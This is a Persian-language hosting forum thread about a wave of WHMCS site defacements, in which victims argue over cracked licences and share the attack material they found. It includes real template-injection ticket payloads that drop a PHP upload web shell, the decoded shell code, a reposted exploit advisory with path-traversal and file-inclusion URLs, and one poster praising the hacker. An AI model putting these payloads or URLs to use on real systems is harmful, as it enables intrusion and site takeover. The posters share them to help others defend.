پاسخ : هک یا بچه بازی؟!!!whmcs!
dr.saeed : این یک مورد با بقیه فرق داره کمی تو انجمن جست و جو کنین
پاسخ : هک یا بچه بازی؟!!!whmcs!
واقعا تاسف بر انگیز هست، از دو جهت ، اول اهمیت ندادن سرویس دهنده های محترم و دوم سوء استفاده از باگی که به راحتی قابل استفاده هست .
با هر حال این هم نوعی نشون دادن اعتراض هست. پیشنهاد میکنم تاپیکی ایجاد بشه که هم هکر و هم قربانی حرفشون رو بزنن چون ممکنه اعتبار سرویس دهنده زیر سئوال بره !
پاسخ : هک یا بچه بازی؟!!!whmcs!
واقعا متاسفم برای همکارانی که قصد این کار رو دارند
پاسخ : هک یا بچه بازی؟!!!whmcs!
من این رو دیدم در سایت شما!
تو پست فروشتونم دادم!
فکر می کردم اسمش باید محمد باشه:dHacked By : Mohammad_m380
Iranian Hacckers Team . Tanks To B4hr4m
لطفا مشکل امنیتی خود را رفع نمیایید .
Bye Bye Admin
We Love Iran
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
arman_gts
من این رو دیدم در سایت شما!
تو پست فروشتونم دادم!
فکر می کردم اسمش باید محمد باشه:d
Hacked By : Mohammad_m380
Iranian Hacckers Team . Tanks To B4hr4m
لطفا مشکل امنیتی خود را رفع نمیایید .
Bye Bye Admin
We Love Iran
بله،منم که نمی دونم اصلا کار کیه!الکی
پاسخ : هک یا بچه بازی؟!!!whmcs!
با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم
پاسخ : هک یا بچه بازی؟!!!whmcs!
خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
atilnic
خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
plastic
نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
امنیت هیچ موقع 100% نیست
کاربری که به فکر امنیتش باشه یعنی براش مهم باشه مطمئنن با نسخه ی نال هم امینت خودش رو به حد نصاب می رسونه
کاربری هم به فکر امنیت نباشه چه با لاینسس چه بی لاینسس خواهد خورد
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
plastic
نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
اونی که میاد نال میزنه و ...
اصلا کـــــــــــــــــــــــا ری نــــــــــــــــدارم!!!!!!!! !!!!!!
هاستینگ که پول یک لایسنس whmcs که اساس کارش هست رو نداره،اصلا هساتینگ نیست!!!:-&
تمام شد!!!
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
dr.saeed
امنیت هیچ موقع 100% نیست
کاربری که به فکر امنیتش باشه یعنی براش مهم باشه مطمئنن با نسخه ی نال هم امینت خودش رو به حد نصاب می رسونه
کاربری هم به فکر امنیت نباشه چه با لاینسس چه بی لاینسس خواهد خورد
به نظر من هرکی نال میکنه یه باگ هم داخلش نالش میزاره در صورت لزوم
اکثرا هم به خاطر رعایت نکردن حق سایتی هست که نال رو انجام میده این موارد پیش میاد
یعنی مثلا پرشن اسکریپت میاد نال میکنه و یک هاستینگ یا یک شخص میاد این اسکریپت رو دانلود میکنه و قسمت پرشین اسکریپت یا نام اون سایت رو حذف میکنه من هم باشم ناراحت میشم و باگی که تو اسکریپ گذاشته باشم لو میدم به یه هکر
به نظر من نسخه نال شده برای چیزایی خوبه استفاده کنیم که خطری رو برای کاربران سایت نداشته باشه نه یه اسکریپ پشتیبانی کاربران هاستینگ استفاده کنیم که اینجوری سایت من که از اون سایت سرویس گرفته بسته شه و نتونم با اون سرویس دهنده تماس بگیرم برای تغییریک دی ان اس یا انتقال اطلاعات هاستینگ
پاسخ : هک یا بچه بازی؟!!!whmcs!
من نال نبودم هک شدم
---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------
الان یه تیکت اومد واسم
کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
اهمیت: Medium
محتوای سوال
=============================
hi
----------------------------
IP Address: 46.19.139.252
پاسخ : هک یا بچه بازی؟!!!whmcs!
نمیدونم چه ربطی به نال بودن داره دیگه با این موارد که عرض شد باید نتیجه گیری میشد که به نال بودن مربوط نمیشه .
کسی هم که یه چیزی رو نال میکنه نمیاد توش باگ هم درست بکنه!! چون در این صورت نال کردنش = سرگرمی و تفریح و کار الکی
پس به نال بودنش هیچ ربطی نداره.
به هر حال شاید هم ربط داشته باشه و در جریان نباشیم!
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
maryam1
من نال نبودم هک شدم
---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------
الان یه تیکت اومد واسم
کاربر: hamid rahmati #16
بخش: بخش فروش <snipped>اهمیت: Medium
محتوای سوال
=============================
hi
----------------------------
IP Address: 46.19.139.252
شما patch امنیتی رو نصب کرده بودید؟
پاسخ : هک یا بچه بازی؟!!!whmcs!
بله هم پچو هم باقی چیزارو البته هک رو قبل از نصب پچ شدم
الان طذف سوسک شد:73:
پاسخ : هک یا بچه بازی؟!!!whmcs!
بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:
کد:
$b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability !
$b0x# ZxH-Labs
$b0x# 1st-NOV-11
$b0x# Www.Sec4ever.coM
$b0x# WH-03 On Windows IIS 6.0
========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL
EXPL Type : Local File Disclosure
Files : Submitticket.php , Downloads.php
-> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00
->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00
b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug
Bug TYPE : Local File Include
Bug File : Reports.php
-I : reports.php?report=[LFI]%00
EX : admin/reports.php?report=../../../../../../../boot.ini%00
You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
-FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
And Don't Forget To Use IFRAME With Evil Code'z =))
b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3 And All Q8'z
./b0x
پاسخ : هک یا بچه بازی؟!!!whmcs!
امن ترین سرور یک سرور خاموش است!
پاسخ : هک یا بچه بازی؟!!!whmcs!
کل کدی که اینجکت میشه در تیکت ها( با توجه به ارسال maryam1) این هست:
کد:
<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>
و $code عبارته از:
کد:
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
با توجه به این موارد میتونید جلوی مورد رو بگیرید.
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
faranetwork
dr.saeed : این یک مورد با بقیه فرق داره کمی تو انجمن جست و جو کنین
اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.
نقل قول:
نوشته اصلی توسط
taranoome
با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم
نقل قول:
نوشته اصلی توسط
atilnic
خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.
پاسخ : هک یا بچه بازی؟!!!whmcs!
بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟
نقل قول:
کاربر: iiiii gggggg #77
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsI nciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
MbjHosting
اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.
ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.
اصلا اسم شما رو آوردیم؟!!!!!
اصلا گفتیم که فلانی؟شما چرا جوش آوردی؟
فکر کنم امشب یکم... :104:
---------- Post added at 09:10 PM ---------- Previous post was at 09:09 PM ----------
نقل قول:
نوشته اصلی توسط
maryam1
بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟
آدرس سایتتون رو لطف می کنید؟
شماره ثبت ندادید
حداقل آدرس سایت بدید ببنیم اصلا سایتتون چیه و ...؟؟؟؟
پاسخ : هک یا بچه بازی؟!!!whmcs!
فکر کنم بعضیا به خودشون شک دارن:))
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
atilnic
خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه :))
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ... @-)
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند
:)) مثال جدید بود
نقل قول:
نوشته اصلی توسط
plastic
نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.
whmcs خیلی وقت میشه که برای این مشکل راه حلی جلوی پای کاربر ها قرار داده که فکر می کنم افرادی که null شده استفاده می کنند نمیتونین استفاده کنند
در مورد اون 90% هم که گفتین به نظر 100% اشتباه می کنین :">
پاسخ : هک یا بچه بازی؟!!!whmcs!
نقل قول:
نوشته اصلی توسط
atilnic
اصلا اسم شما رو آوردیم؟!!!!!
اصلا گفتیم که فلانی؟شما چرا جوش آوردی؟
فکر کنم امشب یکم... :104:
نقل قول:
نوشته اصلی توسط
taranoome
فکر کنم بعضیا به خودشون شک دارن:))
اگر فکر کردید منظور بدی داشتم ببخشید
-----
دوستان با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80
طبق http://whois.domaintools.com/188.138.100.80، دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.
موفق باشید.
